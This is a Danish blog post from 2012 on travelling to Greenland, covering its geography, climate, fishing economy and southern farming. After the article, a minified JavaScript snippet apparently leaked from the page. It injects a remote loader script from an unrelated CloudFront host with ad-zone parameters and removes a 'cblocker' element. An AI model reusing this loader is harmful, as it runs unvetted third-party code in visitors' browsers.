Smartlog v3 » Tips, Guides & Informationer » Oplev Grønland
Opret egen blog | Næste blog »

Tips, Guides & Informationer

Her på bloggen kan du læse gratis tips, guides og informationer om alt mellem himmel og jord

Oplev Grønland

12. Jun 2012 11:49, webmayn

En flyrejse til Grønland er en rejse til oplevelser. Grønland er et fantastisk land, med kun 59.000 indbyggere, som til gengæld deler et areal på over 2.000.000 Km2.

 

Grønland er geologisk set et af verdens ældste landområder, da man kan datere det hele 3.8 mia. år tilbage.

Det er et land, der er dækket af is på 85% af territoriet, hvilket gør Grønland til jordens største isdækkede område efter Antarktis. Pga. Grønlands størrelse er der dog stor forskel på klimaet i nord og syd, men det ændrer ikke på at klimaet på Grønland er arktisk, hvilket betyder at ingen af månederne har en gennemsnitstemperatur over 10 grader Celcius. 

 

Grønland har en helt unik natur, og byder derfor på mange forskellige oplever, hvis man vælger at tage et fly til Grønland.

 

Økonomien på Grønland afhænger meget af fiskeri. Det er deres grundlag for indtjening, og grønlænderne er derfor eksperter i at fiske. De fisker ikke bare i elvene eller på havet, men også om vinteren tager de ud på isen med hundeslæde, hvor de hugger et hul i isen, og derefter sænker en line dybt ned vandet.

Den vigtigste ressource fra fiskeriet er rejerne, som i Grønland er kendt som det røde guld. Derudover er torsken også en vigtig ressource, men der har grundet klimatiske årsager ikke været nær så mange torsk i de grønlandske farvende som før.  

 

Udover fiskeri findes der også mindre landbrug i Sydgrønland. Her dyrkes der bl.a. kartofler, majroer hø og andet. Der drives også fåreavl i Sydgrønland, som bliver solgt på hjemmemarkedet. I 1997 startede et lille slagteri også en mindre eksport af kvalitetslammekød til restauranter og supermarkedskæder i Danmark.

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Tags

Relaterede